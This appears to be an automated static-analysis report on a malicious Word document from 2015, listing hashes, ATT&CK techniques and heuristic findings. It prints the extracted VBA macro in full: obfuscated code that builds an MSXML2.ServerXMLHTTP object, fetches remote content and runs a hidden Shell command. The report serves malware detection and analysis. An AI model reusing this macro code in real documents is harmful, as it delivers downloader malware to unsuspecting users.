Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6e4391c618a11175…

MALICIOUS

Office (OLE)

255.5 KB Created: 2015-08-04 11:27:00 Authoring application: Microsoft Office Word First seen: 2015-09-18
MD5: 02eb0a2544915cb400886de58c7f8310 SHA-1: 49ccf7792db7c75e1227b445681b159efdcef6da SHA-256: 6e4391c618a11175c7fc171c991b66e3b64387e0f048a52764a7bde7aacbcbd8
190 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample is a malicious Word document containing VBA macros. The `OLE_VBA_SHELL` and `OLE_VBA_PCODE_AUTOEXEC_EXEC` heuristics indicate the presence of a macro that uses the `Shell` function, likely to execute a downloaded payload. The `CreateObject` call and the string `ML2.ServerXMLHTTP` suggest the macro attempts to interact with the network to fetch additional content.

Heuristics 7

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    bydd = Shell(a, 0)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Nqhdkjahsjdhjkqwhkdqwh = CreateObject(BTYQWFDYFQWTDWQAA)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Goabc = Environ(sps)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://www.iec.chIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2342 bytes
SHA-256: f66fa68bb2929153969d22deab3a767c8fb71b7d9d53ce5343d072e8ea223527
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub Hameleon()
Dim ij As Integer
Dim charCount As Integer
charCount = ActiveDocument.Characters.Count - 1
ij = 0
Do While True
    ij = ij + 1
    If (ActiveDocument.Characters(ij) = "#") Then
        If (ActiveDocument.Characters(ij - 1) = "$") Then
            ActiveDocument.Range(Start:=0, End:=ij).Delete
            ActiveDocument.Range(Start:=0, End:=charCount - ij - 1).Font.ColorIndex = wdBlack
            Exit Do
        End If
    End If
    If (ij = charCount) Then
        Exit Do
    End If
Loop
End Sub

Public Function Goabc(sps As String)
AAUQWHDQW = "178231789378291e"
Goabc = Environ(sps)
End Function





Attribute VB_Name = "Module2"
Public Function Puhlo(a As String)
Dim bydd As Variant
bydd = Shell(a, 0)
End Function

Public Function Linolium(nbqjbdjqw As String)
Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, Nqhdkjahsjdhjkqwhkdqwh As Object, AHUDWQI As String
Dim ashdUHhda As String, dddc As Integer, AABDBHDDD As String, AsaHuhqdjhasd As String, AAHQJD As String
AsaHuhqdjhasd = nbqjbdjqw
ashdUHhda = AsaHuhqdjhasd
'hujdhgq
dddc = 1 - (Atn(20))
HQDUQ = hhr(Val(81 + dddc))
BHQDHJWQDW = "ML2.ServerXMLH"
BYGDWHQGWHDWQ = BHQDHJWQDW + "TT" + HQDUQ
'nasdhjkqwqd
AABDBHDDD = "E"
NBWHDWDQ = Chr(44 * 1 * 2 + 1 * 4 * dddc)
AABDBHDDD = "G" + AABDBHDDD & NBWHDWDQ
BTYQWFDYFQWTDWQAA = "MSX" + BYGDWHQGWHDWQ
'djqhdkasdkhsj
Set Nqhdkjahsjdhjkqwhkdqwh = CreateObject(BTYQWFDYFQWTDWQAA)
Nqhdkjahsjdhjkqwhkdqwh.Open AABDBHDDD, ashdUHhda
Nqhdkjahsjdhjkqwhkdqwh.Send (AHUDWQI)
AAHQJD = ThisDocument.NHdjhasbdhas(Nqhdkjahsjdhjkqwhkdqwh)
Linolium = AAHQJD
End Function

Sub Crispy(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub

Public Function Kakarumba(n As Integer)
Dim i As Integer
For i = 1 To n Step 1
    Randomize
    Kakarumba = Kakarumba + Chr(Int(121 * Rnd) + 97)
Next i
End Function
Public Function hhr(sps As Integer)
hhr = Chr(sps)
End Function